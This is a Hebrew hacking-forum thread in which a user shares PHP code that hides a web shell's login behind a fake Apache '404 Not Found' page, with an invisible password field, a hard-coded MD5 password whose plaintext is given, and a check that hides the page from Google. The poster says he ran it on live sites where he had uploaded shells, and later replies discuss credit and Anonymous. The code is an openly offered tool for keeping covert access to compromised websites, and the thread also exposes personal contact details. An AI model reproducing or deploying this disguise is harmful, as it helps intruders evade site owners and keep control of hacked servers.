קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] הסבר על שאלל(shell) ואיך מעלים אותו על אתר
    על ידי roee147 בפורום האקינג ואבטחת מידע
    תגובות: 14
    הודעה אחרונה: 09-09-2010, 11:52
  2. [פי.אס.פי] IR Shell
    על ידי Awes0me בפורום קונסולות משחקים
    תגובות: 10
    הודעה אחרונה: 09-11-2009, 14:29
+ תגובה לנושא
מציג תוצאות 1 עד 8 מתוך 8

404 Shell

  1. #1
    משתמש מתחיל
    שם פרטי
    יובל
    תאריך הצטרפות
    12/2010
    הודעות
    449
    לייקים
    51
    נקודות
    75
    משפט מחץ
    אני רוט בנטורל - לא עושה דיפייס בכלל! 3>
    מין: זכר

    ברירת מחדל 404 Shell

    נושא קטן אשר התחיל לצוץ לא פעם ולא פעמיים בקהילות למיניהן וסקרן אותי אישית לא מעט. נגיד שהצלחתם לדחוף שאלל לאתר, מה ימנע מבעל האתר לעלות עליו, למחוק אותו, לתקן את הפריצה ובום טראח? לא הרבה. אולי סיסמא מוצפנת בכניסת השאלל, אבל גם זה נראה מחשיד ביותר ולא מי-יודע-מה קשה לניתוח מצד מתכנת / בעל האתר.

    פתרון אפשרי: הסוואת השאלל בתור שגיאת דף.

    אנימציית GIF:

    (לא שלי, תמונת הGIF נמצאה באינטרנט ללא מקור ברור & האתר כבר מת מזמן)

    כפי שאתם רואים, המראה של השגיאה זהה אחד לאחד לשגיאת 404 אמיתית של האתר (נוסח ברירת מחדל של הקנפוג), במבט חטוף לא ניתן להבדיל בכלל, כלומר, אם לא תדע מלכתחילה שיש שמה משהו, אתה לא תמצא כלום. ניתן לקחת את הרעיון אפילו רחוק יותר עם הגדרת הcURL ושימושה כזיהוי שגיאת ה404 אוטומטית באתר וחיקוי המציאה, אבל כרגע אשאר בבסיס. אחרי שמציבים את השגיאה המזויפת, מסדרים שדה (גם, בלתי נראה ממבט ראשון) קלט מסוג סיסמא, שבו מכניסים את הסיסמא המוגדרת בשאלל, רק אם הצלחת לשים את הסיסמא הנכונה אתה תיכנס לשאלל. לדעתי, זה לא פחות מסוג חדש וחכם ביותר של PHP SHELL.

    אבל למה להשאיר אותכם במילים? ניתן לקוד לדבר.

    <?
    "auth_pass = "f105d2e7e230814257820eada783f9cd";
    if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
    function printLogin() {
    ?>
    <h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>
    <hr>
    <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
    input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    exit;
    }
    if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
    ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
    $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
    printLogin();
    ?>



    הקוד לא במקור שלי, אלא של Zer0Pwn, עם כמה עריכות לא קטנות שלי. (ביטול אינדקסים של גוגל, ועוד שטויות כגון סיישן)
    מחרוזת הMD5:
    RAINBOW
    באותיות גדולות.
    הבולאן בהתחלה מונע מגוגל 'לאנדקס' (להוסיף למאגר תוצאות החיפוש שלהם) את הדף, מה שיכול להיות מגוחך ביותר במקרה של ההאקר והשאלל שלו.
    הבהרה: הסקריפט עצמו לא מהווה 'כלי פריצה' בשום דרך הגיונית, אלא רק קוד PHP+HTML.

    תמונות להמחשת תיאור -
    לפני הלוגין:
    http://www.fastup.co.il/images/63936048.jpg
    אחרי הלוגין, כניסה לשאלל:
    http://www.fastup.co.il/images/76106018.jpg
    (אלפי סליחות על השימוש באתרים חיים על מנת לצלם את התרחישים, לצערי אני על מחשב נייד חלש ביותר אשר לא יכול לתפעל פה שרת בסגנון WAMP, מיותר לציין כי שום נזק לא נגרם לאתרים הנ"ל, גם בגלל זה צנזרתי כל חלק אפשר אשר עלול לספק מידע רגיש אודות השרתים.)

    אז מה היא דעתכם על הרעיון? חכם / נדוש? מוזמנים להפוך את האשכול לדיון פורה


    כל מידע המופיע באשכול הנ"ל נכתב ממטרות למידה בלבד למטרות למידה בלבד, האשכול בשום פנים ואופן לא מתיימר להוות אשכול פוגע / 'בלאק האט' / לא חוקי וכדומה. כל שימוש לא חוקי בסקריפט הPHP ו/או במידע אשר מופיע באשכול זה מתחיל ונגמר באחריותכם בלבד, ואני לא לוקח שום אחריות על מעשיכם.
    נערך לאחרונה על ידי Crazy_Style; 12-05-2012 בשעה 18:47.

    סקייפ: niki-k1ng79 | סטים (Steam)
    Rainbow_Dash | Th3PonyWizard
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

  2. קישורים ממומנים

  3. #2
    משתמש מתחיל
    שם פרטי
    אורי P:
    תאריך הצטרפות
    01/2012
    הודעות
    59
    לייקים
    3
    נקודות
    0
    משפט מחץ
    שניצל פגש שניצלת .. הם היתחתנו ונולד להם שניצלון .. !!
    מין: זכר

    ברירת מחדל

    תשנה תפורט נגעת
    ב אתר של הראוטר שלך!
    משהו port web תשים את זה פורט 80!





  4. #3
    משתמש מתחיל
    שם פרטי
    יובל
    תאריך הצטרפות
    12/2010
    הודעות
    449
    לייקים
    51
    נקודות
    75
    משפט מחץ
    אני רוט בנטורל - לא עושה דיפייס בכלל! 3>
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי OriGranot צפיה בהודעה
    תשנה תפורט נגעת
    ב אתר של הראוטר שלך!
    משהו port web תשים את זה פורט 80!
    אתה צוחק עלי. אתה...צוחק עלי, כן?
    ממתי לראוטר שלי יש סיומת co.il?
    מה שאני צילמתי והראתי (לא בכוונת זדון) זה את השאלל שלי על אתר חיי שאני העלתי, שאני אעדיף שלא לפרסם פה את הכתובת שלו.
    אחוק, בבקשה לעשות מחקר קודם, ואז לדבר.

    סקייפ: niki-k1ng79 | סטים (Steam)
    Rainbow_Dash | Th3PonyWizard
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

  5. #4
    משתמש מתחיל
    תאריך הצטרפות
    08/2011
    הודעות
    186
    לייקים
    19
    נקודות
    50
    מין: נקבה

    ברירת מחדל

    ממש מגניב , כנראה שיעבור אצלי מימוש למטרות ניסיון ,

    יובל הייתי שמחה אם היית יוצר איתי קשר..
    נערך לאחרונה על ידי Olly; 21-03-2012 בשעה 19:30.

  6. #5
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    ברירת מחדל

    השאאל פותח במקור על ידי anonymous עוד לפני חודש בערך.
    נערך לאחרונה על ידי OverPowered; 21-03-2012 בשעה 21:00.



  7. #6
    משתמש מתחיל
    שם פרטי
    יובל
    תאריך הצטרפות
    12/2010
    הודעות
    449
    לייקים
    51
    נקודות
    75
    משפט מחץ
    אני רוט בנטורל - לא עושה דיפייס בכלל! 3>
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Olly צפיה בהודעה
    ממש מגניב , כנראה שיעבור אצלי מימוש למטרות ניסיון ,

    יובל הייתי שמחה אם היית יוצר איתי קשר..
    שמח שמצאת בזה עניין
    את מוזמנת לנסות ולתפוס אותי בסקייפ (niki-k1ng79), סטים(חתימה), או במסן + אימייל - xniki870@gmail.com

    ציטוט נכתב במקור על ידי OverPowered צפיה בהודעה
    השאאל פותח במקור על ידי anonymous עוד לפני חודש בערך.
    איזה שאלל, רעיון ה404? האשכול הכי ראשון שמצאתי בנושא הזה (וגם האשכול של הGIF) הינו מדצמבר, 2011, בקהילת ההאקינג HackForums.
    אם התכוונת לGNY.SHELL, אז אני מניח שאתה צודק, כי חבר הביא לי את השאלל הזה לפני שבוע~שבועיים (נקי) ואין לי שמץ מי היוצר שלו, בדרך כלל יוצרים של דברים כאלה דואגים לקרדיטים. הממ..
    ד"א חשוב לזכור שאנונימוס אינה קבוצה.

    סקייפ: niki-k1ng79 | סטים (Steam)
    Rainbow_Dash | Th3PonyWizard
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

  8. #7
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Crazy_Style צפיה בהודעה
    שמח שמצאת בזה עניין
    את מוזמנת לנסות ולתפוס אותי בסקייפ (niki-k1ng79), סטים(חתימה), או במסן + אימייל - xniki870@gmail.com


    איזה שאלל, רעיון ה404? האשכול הכי ראשון שמצאתי בנושא הזה (וגם האשכול של הGIF) הינו מדצמבר, 2011, בקהילת ההאקינג HackForums.
    אם התכוונת לGNY.SHELL, אז אני מניח שאתה צודק, כי חבר הביא לי את השאלל הזה לפני שבוע~שבועיים (נקי) ואין לי שמץ מי היוצר שלו, בדרך כלל יוצרים של דברים כאלה דואגים לקרדיטים. הממ..
    ד"א חשוב לזכור שאנונימוס אינה קבוצה.
    אז מה זה אנונימוס? כת השטן?
    באמת אחי..



  9. #8
    משתמש מתחיל
    שם פרטי
    יובל
    תאריך הצטרפות
    12/2010
    הודעות
    449
    לייקים
    51
    נקודות
    75
    משפט מחץ
    אני רוט בנטורל - לא עושה דיפייס בכלל! 3>
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי OverPowered צפיה בהודעה
    אז מה זה אנונימוס? כת השטן?
    באמת אחי..
    לא, אנונימוס אינה כת השטן, אך גם לא כל הגדרה שהיא לקבוצת 'האקינג'. אנונימוס הינו אידיאל משותף שכל איש אשר מעוניין להישאר אנונימי חולק, אותו איש שפורץ על פי מטרתו & למען מטרתו (וגם בשביל להוסיף את כל קונספט ה'רוב' נגד היחיד). אני יכול להיות אנונימוס בין שתיים לארבע, כי אין שום קבוצה מאורגנת, אלא אנשים פרטיים / חבורות אשר בנו את השם הזה על פני המעשים שלהם. הקונספט והאידיאל הטהור הינו רעיון ממש מחוכם - הפלת הארגונים והתשתיות שפוגעות באזרחים ובמשתמשים שלהם במקום להגן, הריסתם והפחדתם. אותו רעיון נדפק קשות על ידי סקריפט קידיז ואנשים שחושבים שזה מגניב להדביק את המסיכה של גאי פוקס על דיפייס / התקשורת והמדיה שאוהבות לסלף דברים בשביל להקפיץ אנשים וכו' - זה למה אנחנו לא רואים פעולות 'טובות' בשם אנונימוס כמעט יותר.

    הנקודה היא - אף פעם לא הייתה קבוצה, וגם לא תהיה. אנונימוס זאת לא קבוצה, זה רעיון משותף / אידיאל / אולי אפילו עקרון, מקווה שהבנת.

    סקייפ: niki-k1ng79 | סטים (Steam)
    Rainbow_Dash | Th3PonyWizard
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 01:08.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,449,538 | הודעות: 8,150,120 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect